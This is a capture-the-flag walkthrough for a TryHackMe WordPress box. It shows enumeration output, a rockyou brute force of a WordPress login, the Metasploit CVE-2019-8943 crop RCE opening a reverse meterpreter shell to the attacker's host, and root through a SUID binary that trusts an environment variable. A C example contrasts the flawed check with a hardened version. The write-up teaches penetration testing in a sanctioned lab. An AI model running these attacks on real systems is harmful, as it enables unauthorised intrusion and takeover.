The first of, hopefully, many posts covering vulnerable machines from TryHackMe, HackTheBox, root-me, etc.
Our box description reads, “Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome! Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…“. This box is also tagged with “wordpress“, “blog“, “web“ and, importantly, “cve 2019-8943“. We should keep that in mind as we enumerate. There is also a footnote: “In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.“, so make sure to update /etc/hosts before you start.
We’ll start off with the basic nmap scan:
odin@asgard:~$ nmap -sC -sV 10.10.119.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 11:17 EDT
Nmap scan report for blog.thm (10.10.119.194)
Host is up (0.089s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel’s IT Blog – The IT blog
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2020-10-08T15:17:42+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-08T15:17:43
|_ start_date: N/A
We have typical ssh on 22, web server on 80, and SMB on 139/445. Nmap has already identified that we’re looking at a WordPress 5.0 instance on the web server. Since this is a WordPress site, let’s run WPScan against it to see what we can find (we could also dirb/gobuster the web server, but we’ll circle back on this if nothing comes up):
odin@asgard:~$ wpscan --url 10.10.119.194
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.119.194/ [10.10.119.194]
[+] Started: Thu Oct  8 11:17:47 2020

Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://10.10.119.194/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.119.194/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.119.194/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.119.194/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.119.194/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.119.194/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.119.194/, Match: 'WordPress 5.0'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Oct  8 11:17:54 2020
[+] Requests Done: 45
[+] Cached Requests: 5
[+] Data Sent: 9.474 KB
[+] Data Received: 126.913 KB
[+] Memory used: 192.367 MB
[+] Elapsed time: 00:00:07
Perfect. So, let’s use WPScan’s user enumeration (the --enumerate u option) to find logins (excess lines removed):
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)

[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)
Interesting. We’ve found two logins, bjoel and kwheel (Karen Wheeler and Billy Joel are display names pulled from the RSS feed, not usernames). Note that the wp-json users endpoint handed these over without any authentication, which is a finding in its own right. Given the “cve 2019-8943“ tag and the version WPScan flagged (WordPress 5.0, insecure, released 2018-12-06), the likely route is an authenticated exploit, so the next goal is a valid password for one of these two accounts. We can check out the Samba share while we’re at it, but it is most likely a dead end.
odin@asgard:~$ enum4linux 10.10.119.194
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Oct  8 12:12:40 2020

==========================
|  Target Information    |
==========================
Target ........... 10.10.119.194
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=====================================================
|  Enumerating Workgroup/Domain on 10.10.119.194    |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
|  Nbtstat Information for 10.10.119.194    |
=============================================
Looking up status of 10.10.119.194
BLOG            <00> -         B <ACTIVE>  Workstation Service
BLOG            <03> -         B <ACTIVE>  Messenger Service
BLOG            <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
|  Session Check on 10.10.119.194    |
======================================
[+] Server 10.10.119.194 allows sessions using username '', password ''

============================================
|  Getting domain SID for 10.10.119.194    |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
|  OS information on 10.10.119.194    |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.119.194 from smbclient:
[+] Got OS info for 10.10.119.194 from srvinfo:
BLOG           Wk Sv PrQ Unx NT SNT blog server (Samba, Ubuntu)
platform_id     :       500
os version      :       6.1
server type     :       0x809a03

==============================
|  Users on 10.10.119.194    |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

==========================================
|  Share Enumeration on 10.10.119.194    |
==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        BillySMB        Disk      Billy's local SMB Share
        IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------
        BLOG                 blog server (Samba, Ubuntu)

        Workgroup            Master
        ---------            -------
        WORKGROUP            BLOG

[+] Attempting to map shares on 10.10.119.194
//10.10.119.194/print$   Mapping: DENIED, Listing: N/A
//10.10.119.194/BillySMB Mapping: OK, Listing: OK
//10.10.119.194/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
BillySMB is the one to look at. Let’s connect to it with smbclient (the server allows null sessions, so just press Enter at the password prompt):
odin@asgard:~$ smbclient //10.10.119.194/BillySMB
Enter WORKGROUP\odin's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue May 26 14:17:05 2020
  ..                                  D        0  Tue May 26 13:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  check-this.png                      N     3082  Tue May 26 14:13:43 2020

                15413192 blocks of size 1024. 9789876 blocks available
White Rabbit…yeah, a dead end here. Let’s head back to the WordPress route. We can try brute forcing the login(s) using WPScan (excess lines removed). With no --usernames given, WPScan attacks every name it enumerated, including the display names Karen Wheeler and Billy Joel; restricting it to --usernames bjoel,kwheel would save some time:
odin@asgard:~$ wpscan --url 10.10.119.194 --passwords /usr/share/wordlists/rockyou.txt
...
[i] User(s) Identified:

[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)

[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 4 user/s
[SUCCESS] - kwheel / *redacted*
Awesome! We have success via rockyou.txt. The password sits early in the list, and it is also present in the smaller rockyou-40, 45, 50, 55, 60, 65, 70 and 75 subsets, so those would be somewhat quicker if you want to narrow your own search. With a valid login in hand we can use the vulnerability the box tag points at: CVE-2019-8943, a path traversal in WordPress’s image cropping function, which is chained with CVE-2019-8942 (manipulation of the _wp_attached_file post meta) to turn an uploaded image carrying PHP in its metadata into remote code execution. The chain needs at least author privileges (kwheel turns out to have them, since the exploit works) and affects 5.0 and earlier; it was fixed in 5.0.1. Lucky for us, this is already available in Metasploit as exploit/multi/http/wp_crop_rce (see https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce). There are also videos (https://www.youtube.com/watch?v=6Sxs4vQJK_s) and blogs (https://pentest-tools.com/blog/wordpress-remote-code-execution-exploit-cve-2019-8942/) that walk through the manual process from before the module existed. Since those cover the details better, we’ll continue with the module route for ease and speed.
msf5 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.119.194
RHOSTS => 10.10.119.194
msf5 exploit(multi/http/wp_crop_rce) > set LHOST 10.6.22.82
LHOST => 10.6.22.82
msf5 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf5 exploit(multi/http/wp_crop_rce) > set PASSWORD *redacted*
PASSWORD => *redacted*
msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 10.6.22.82:4444
[*] Authenticating with WordPress using kwheel:*redacted*…
[+] Authenticated with WordPress
[*] Preparing payload…
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38288 bytes) to 10.10.119.194
[*] Meterpreter session 1 opened (10.6.22.82:4444 -> 10.10.119.194:47310) at 2020-10-08 14:15:08 -0400
[*] Attempting to clean up files...
meterpreter >
Perfect! We’re in.
meterpreter > shell
Process 1568 created.
Channel 1 created.
Nobody likes an ugly shell…
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blog:/var/www/wordpress$
Much nicer. The prompt already tells us what ‘whoami’ and ‘pwd’ would: we are www-data, sitting in ‘/var/www/wordpress’. Now, where is the user.txt flag? Usually it sits in someone’s home directory.
www-data@blog:/var/www/wordpress$ ls /home/
ls /home/
bjoel
www-data@blog:/var/www/wordpress$ cd /home/bjoel/
cd /home/bjoel/
www-data@blog:/home/bjoel$ ls
ls
Billy_Joel_Termination_May20-2020.pdf user.txt
www-data@blog:/home/bjoel$ cat user.txt
cat user.txt
You won't find what you're looking for here.
TRY HARDER
Lovely, a ‘but our princess is in another castle’ scenario. I was also curious about the ‘user termination’ PDF. After examining it, it seems Mr. Joel may have owned a Rubber Ducky; more on that near the end. For now, let’s get ‘linpeas‘ onto the target box and see if it turns up anything “interesting”; we’ll come back to the flag files later.
====================================( Interesting Files )=====================================
[+] SUID – Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
/usr/bin/passwd —> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/newgrp —> HP-UX_10.20
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec —> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/chfn —> SuSE_9.3/10
/usr/bin/sudo —> /sudo$
/usr/bin/at —> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/sbin/checker
There is much more to this list, but we’ll cut the additional searching for readability (try this yourself and see how LinPEAS can make things easier...sometimes). https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ is a great resource with MANY items to look for when attempting basic Linux privilege escalation. After going through the list a bit, I ran find / -perm -u=s -type f 2>/dev/null to list the SUID files myself. We again see ‘/usr/sbin/checker’, which is something I’m not familiar with; the rest are standard Ubuntu SUID binaries. A quick Google search for ‘common Unix binaries’ or ‘vulnerable Unix binaries’ returns many results pointing to https://gtfobins.github.io/. ‘checker’ doesn’t appear there, so now I’m curious.
I try to run ‘checker’ to see what happens:
www-data@blog:/home/bjoel$ checker
Not an Admin
Not an Admin….makes sense. What sort of file is this?
www-data@blog:/usr/sbin$ file checker
checker: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6cdb17533a6e02b838336bfe9791b5d57e1e2eea, not stripped
Ok, I am no Unix wizard at all. So after about 45 minutes of Googling, I ran a few different tools (xxd, objdump, etc.) to see exactly what this program does. Since the disassembly is mostly calls into GLIBC, the quickest way to see what it does at runtime is ‘ltrace‘, which logs each library call together with its return value:
www-data@blog:/usr/sbin$ ltrace checker
ltrace checker
getenv(“admin”) = nil
puts(“Not an Admin”Not an Admin
) = 13
+++ exited (status 0) +++
So I may have interpreted this incorrectly, but I took “nil” to be “null”, or “0”. In ltrace’s output “nil” is a NULL return: getenv(“admin”) found no variable of that name, so the program printed “Not an Admin” and exited. In other words, the binary decides whether you are an admin purely on the presence of an environment variable, and the environment of a SUID program is supplied by whoever runs it. Now having a more general understanding of how this is working, we do the following:
www-data@blog:/usr/sbin$ checker
checker
Not an Admin
www-data@blog:/usr/sbin$ export admin=1
export admin=1
www-data@blog:/usr/sbin$ checker
checker
root@blog:/usr/sbin#
We have root! Let’s find some flags.
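The write-up never recovers checker’s source, so what follows is an added example, not the box’s binary and not the author’s code: a hypothetical reconstruction of the decision checker appears to make (consistent with the ltrace output above, where getenv(“admin”) alone decides between “Not an Admin” and a root shell), next to a hardened policy that ignores the environment. The function names, the enum and the UIDs used in the comments are my own; on a real box the interesting branch would go on to drop into a shell with the SUID root privileges.

```c
/*
 * Added example: a hypothetical reconstruction of the "checker" logic seen
 * under ltrace (getenv("admin"), then either "Not an Admin" or a root shell),
 * alongside a hardened policy. Function names and the enum are invented for
 * this example; this is not the box's real source.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

enum action { DENY = 0, ROOT_SHELL = 1 };

/* A SUID binary runs with ruid = caller and euid = file owner (root here).
 * Whenever the two differ, argv, the environment, the cwd and inherited
 * descriptors all come from a less privileged principal and are hostile. */
int env_is_attacker_controlled(uid_t ruid, uid_t euid)
{
    return ruid != euid;
}

/* Vulnerable policy: trusts the mere presence of an environment variable.
 * getenv() returns NULL (ltrace prints "nil") only when "admin" is unset, so
 * `export admin=1`, `admin=` or any other value at all flips the decision. */
enum action checker_vulnerable_policy(const char *admin_env)
{
    if (admin_env == NULL)
        return DENY;            /* the "Not an Admin" path we saw under ltrace */
    return ROOT_SHELL;          /* the path `export admin=1` takes */
}

/* Hardened policy: the kernel-maintained real UID cannot be forged by the
 * caller, so decide on that (or on group membership / PAM) and never on
 * environment contents. */
enum action checker_hardened_policy(uid_t ruid, const char *admin_env)
{
    (void)admin_env;            /* deliberately unused: never a trust input */
    return ruid == 0 ? ROOT_SHELL : DENY;
}

static const char *describe(enum action a)
{
    return a == ROOT_SHELL ? "would drop to a root shell" : "Not an Admin";
}

int main(void)
{
    uid_t ruid = getuid(), euid = geteuid();
    const char *admin = getenv("admin");   /* attacker-chosen when SUID */

    printf("ruid=%u euid=%u env-is-hostile=%d admin=%s\n",
           (unsigned)ruid, (unsigned)euid,
           env_is_attacker_controlled(ruid, euid),
           admin ? admin : "(unset)");
    printf("vulnerable policy: %s\n", describe(checker_vulnerable_policy(admin)));
    printf("hardened policy:   %s\n", describe(checker_hardened_policy(ruid, admin)));
    return 0;
}
```

Assuming you save it as checker_demo.c, compile with cc -o checker_demo checker_demo.c and run it twice, plain and then as admin=1 ./checker_demo; only the vulnerable policy changes its answer. The real fix for a binary like this is not to ship it SUID at all, or to authenticate through something the caller cannot set (real UID/GID, PAM), and to clear or sanitise the environment before any exec.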
root@blog:/# find / | grep "user.txt"
find / | grep "user.txt"
/home/bjoel/user.txt
/media/usb/user.txt
find: ‘/proc/1441/task/1441/net’: Invalid argument
find: ‘/proc/1441/net’: Invalid argument
A second user.txt flag…
root@blog:/# cat /media/usb/user.txt
cat /media/usb/user.txt
****************************8ab7
/media/usb/ is the ‘rubber ducky’ mentioned in the PDF. This all makes sense now. How about root.txt?
root@blog:/# find / | grep "root.txt"
find / | grep "root.txt"
/root/root.txt
find: ‘/proc/1441/task/1441/net’: Invalid argument
find: ‘/proc/1441/net’: Invalid argument
root@blog:/# cat /root/root.txt
cat /root/root.txt
****************************f318
Overall, this was a fun box, rated at medium difficulty. The initial exploit and access wasn’t too bad. However, the privesc hidden in an unknown executable was a challenge. I did have to extend the box timeout to research how exactly to see what the program did.
